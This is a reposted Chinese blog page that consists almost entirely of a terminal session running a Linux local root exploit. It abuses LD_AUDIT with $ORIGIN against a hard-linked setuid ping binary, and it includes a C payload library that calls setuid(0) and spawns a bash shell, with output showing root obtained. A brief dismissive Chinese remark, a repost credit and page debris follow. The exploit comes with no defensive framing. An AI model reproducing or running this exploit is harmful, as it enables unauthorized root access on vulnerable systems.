[met3or@c3 /]$ ls -al |grep exp
drwxrwxrwx 2 root root 4096 Oct 19 19:25 exp
[met3or@c3 /]$ cd exp
[met3or@c3 exp]$ mkdir exploit
[met3or@c3 exp]$ ls -al
drwxrwxrwx 3 root root 4096 Oct 19 19:26 .
drwxr-xr-x 26 root root 4096 Oct 19 19:24 ..
drwxrwxr-x 2 met3or met3or 4096 Oct 19 19:26 exploit
[met3or@c3 exp]$ ln /bin/ping /exp/exploit/target
[met3or@c3 exp]$ exec 3< /exp/exploit/target
[met3or@c3 exp]$ ls -l /proc/$$/fd/3
lr-x------ 1 met3or met3or 64 Oct 19 19:25 /proc/6030/fd/3 -> /exp/exploit/target
[met3or@c3 exp]$ rm -rf /exp/exploit/
[met3or@c3 exp]$ ls -l /proc/$$/fd/3
lr-x------ 1 met3or met3or 64 Oct 19 19:25 /proc/6030/fd/3 -> /exp/exploit/target (deleted)
[met3or@c3 exp]$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[met3or@c3 exp]$ gcc -w -fPIC -shared -o /exp/exploit payload.c
[met3or@c3 exp]$ ls -l /exp/exploit
-rwxrwxr-x 1 met3or met3or 4223 Oct 19 19:27 /exp/exploit
[met3or@c3 exp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@c3 exp]# whoami
root
[root@c3 exp]# id
uid=0(root) gid=510(met3or) groups=510(met3or)
看的懂的人懂,看不懂的熟悉linux相关基础知识去~
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/440265,如需转载请自行联系原作者
扫一扫
499
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
